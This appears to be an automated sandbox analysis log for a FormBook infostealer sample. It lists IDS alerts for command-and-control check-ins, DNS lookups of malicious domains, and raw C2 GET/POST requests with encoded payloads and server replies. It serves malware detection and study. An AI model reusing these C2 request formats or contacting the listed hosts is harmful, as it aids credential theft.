            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60846 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60840 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60852 -> 3.91.127.116:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60850 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60853 -> 3.91.127.116:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60847 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60847 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60839 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60851 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60844 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60841 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60851 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60839 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60854 -> 3.91.127.116:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60845 -> 156.242.132.82:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60855 -> 3.91.127.116:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60855 -> 3.91.127.116:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60857 -> 195.161.68.8:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60856 -> 195.161.68.8:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60859 -> 195.161.68.8:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60859 -> 195.161.68.8:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60871 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60871 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60862 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60858 -> 195.161.68.8:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60867 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60866 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60867 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60860 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60865 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:60863 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:60863 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60869 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60870 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60864 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60868 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60861 -> 194.58.112.174:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:60834 -> 3.33.130.190:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.animekuid.xyz
            Source: DNS query: www.demovix.xyz
            Source: DNS query: www.broomeorchard.xyz
            Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
            Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
            Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\N2Qncau2rN.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /hfue/?WX=rnWllP5PLlhLLtj&tpTd=GzF3o7eza1dU4F476cHHeral/cYJG+FCwgJMIz0HPlfrSCMBDVuQfjGNmxBd7moVrhCGY2hY7MCgK+MnekgstTp0z3ZjcP9rk68ek43BHqQDCfcAeg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.multileveltravel.worldConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sld7/?tpTd=/serfU6kaxhlkkJx8dOr0qlSRXA+6La0KEB68G6jbYfyT6z2zvVJBFhkOYA104kn6FRHm7lAc7gn2TRu9DlziYvx9tC/5P1WJl131MkdoxRdpo/lsw==&WX=rnWllP5PLlhLLtj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.falconclub.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /abrg/?WX=rnWllP5PLlhLLtj&tpTd=GnAJmiRPPiyH2TmfuBVnsZoXdGf0FUPFySgQhtVOM4GwnDq9Dnvh9ePCWYtJxLLAU+yG0d2c2V85YMiF3u+CH4Whw+Z8K8Lme5ABmnpnJdsWz6g8ww== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.promasterev.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /itly/?tpTd=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouVEB2Caqu0WVs/8KUUJONnONwfAEA0g==&WX=rnWllP5PLlhLLtj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.childlesscatlady.todayConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7un9/?tpTd=4XOwgplivDvk/EZOubh+oM7E4qBWP2ACvZmroFPOKBmtqB+PCSuAHgoGD1T4VUWf5wIO7JPBcjeVh4zPUWd0ua1JHgAe3g4A1TGkBV6DNuNtOYfRKw==&WX=rnWllP5PLlhLLtj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.animekuid.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /szy7/?tpTd=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2jiKrkd/jwL9iqNrnd9yIGgMT9MzICA==&WX=rnWllP5PLlhLLtj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.doggieradio.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /azuc/?WX=rnWllP5PLlhLLtj&tpTd=IEG0cbQocDdgsf0hXa+uAMZkMIV+L9dmDWmvXBjU8TDCB1WiaKjeRQjMK7ZBG/72TlyV3qB8EHQj0nSZZfMRzC5BhxJ3N2wZ76F+LQzPhJ8EwwRHzQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.demovix.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bnrz/?tpTd=OQxwzbuOtqgqEYELNcMucZtHnRjB34c8S/VejUlVZtuveUVj7y4E7KtMGd+fy1MLwhM03wpJ8ksC3Umpmq48p+wh68NaozaF8Wex7USlPt5ZhMWe3g==&WX=rnWllP5PLlhLLtj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.palcoconnector.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /b6g5/?tpTd=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrSmSNv5WmdoflN7m2YOZj8dE3cyj5SIw==&WX=rnWllP5PLlhLLtj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.shanhaiguan.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /n2dv/?tpTd=bOYvUT8qr4FCBQL4q+W2EOsk7MURICY42o+fYfsEfk4vvxNQfURJ5XqGAnjP2wivb2XfCAEuS6lNjanH3pgkh9rgu/pEJ/+PKIa4gq6/Dbg2n2byoA==&WX=rnWllP5PLlhLLtj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.es-lidl.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /eoqq/?tpTd=WfaN7QdSX3VNxg1q9fkfNv4hQq9KYwkNivs6k+R5An5RjxagqDfSiLpQ7QxvwrMnBdqTEtPHhZ8GpglWyWgxMX7+0Hc5PxIPKPsdiKxnaB1g3ZY6yQ==&WX=rnWllP5PLlhLLtj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.wajf.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /c6cw/?WX=rnWllP5PLlhLLtj&tpTd=FqG002IG5EdskeSYnMZEmsgm4M8u04DOLE26DOOOZGkEYfdt2aoEMjGd+Okidkvsa7u+peDvqMbFWL8Zvpj7qkQAFbZLww+9EwijpyIUD9D3/88cfw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.drivedoge.websiteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hd7m/?tpTd=sLbEVsfW73VtVB0Jvj7gC+ceEVX4meQWoUuArYo60q3nO/kAxb5tEPXYoxmPYHkEXIEIOfWFMW/cSWDV+KoY2jgQgwLtxzjq6i8n+9HhH6xOpB1tMw==&WX=rnWllP5PLlhLLtj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.torex33.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
            Source: global trafficDNS traffic detected: DNS query: www.multileveltravel.world
            Source: global trafficDNS traffic detected: DNS query: www.falconclub.online
            Source: global trafficDNS traffic detected: DNS query: www.promasterev.shop
            Source: global trafficDNS traffic detected: DNS query: www.childlesscatlady.today
            Source: global trafficDNS traffic detected: DNS query: www.animekuid.xyz
            Source: global trafficDNS traffic detected: DNS query: www.doggieradio.net
            Source: global trafficDNS traffic detected: DNS query: www.demovix.xyz
            Source: global trafficDNS traffic detected: DNS query: www.palcoconnector.net
            Source: global trafficDNS traffic detected: DNS query: www.shanhaiguan.net
            Source: global trafficDNS traffic detected: DNS query: www.mtcep.org
            Source: global trafficDNS traffic detected: DNS query: www.es-lidl.online
            Source: global trafficDNS traffic detected: DNS query: www.wajf.net
            Source: global trafficDNS traffic detected: DNS query: www.drivedoge.website
            Source: global trafficDNS traffic detected: DNS query: www.torex33.online
            Source: global trafficDNS traffic detected: DNS query: www.broomeorchard.xyz
            Source: global trafficDNS traffic detected: DNS query: www.wcq24.top
            Source: unknownHTTP traffic detected: POST /sld7/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.falconclub.onlineOrigin: http://www.falconclub.onlineCache-Control: max-age=0Content-Length: 193Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.falconclub.online/sld7/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36Data Raw: 74 70 54 64 3d 79 75 32 4c 63 68 76 55 63 45 70 51 68 56 4e 52 35 64 61 53 69 73 5a 4d 65 41 78 47 73 71 2b 75 4f 57 63 37 70 48 4f 67 48 2b 4b 49 62 72 65 38 37 73 70 4b 44 33 70 74 45 6f 45 48 33 49 42 36 7a 53 64 70 68 4f 56 76 4b 65 78 34 79 6b 4d 71 30 48 56 4b 71 35 58 4a 73 76 33 73 72 70 70 6a 64 6c 31 77 30 2f 59 2b 79 30 4e 74 31 36 7a 4b 76 62 66 6a 64 4c 76 41 70 41 43 6e 49 71 73 45 6f 38 53 36 4b 42 62 36 65 62 69 46 4a 35 63 6e 68 31 58 71 37 48 43 38 78 64 56 57 52 49 2f 62 4e 62 6f 6d 4a 68 41 38 4b 38 30 62 75 50 4c 78 48 52 42 46 45 49 5a 52 67 4a 6b 6e Data Ascii: tpTd=yu2LchvUcEpQhVNR5daSisZMeAxGsq+uOWc7pHOgH+KIbre87spKD3ptEoEH3IB6zSdphOVvKex4ykMq0HVKq5XJsv3srppjdl1w0/Y+y0Nt16zKvbfjdLvApACnIqsEo8S6KBb6ebiFJ5cnh1Xq7HC8xdVWRI/bNbomJhA8K80buPLxHRBFEIZRgJkn
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 08 Oct 2024 13:33:53 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 08 Oct 2024 13:33:55 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 08 Oct 2024 13:33:58 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 08 Oct 2024 13:34:01 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 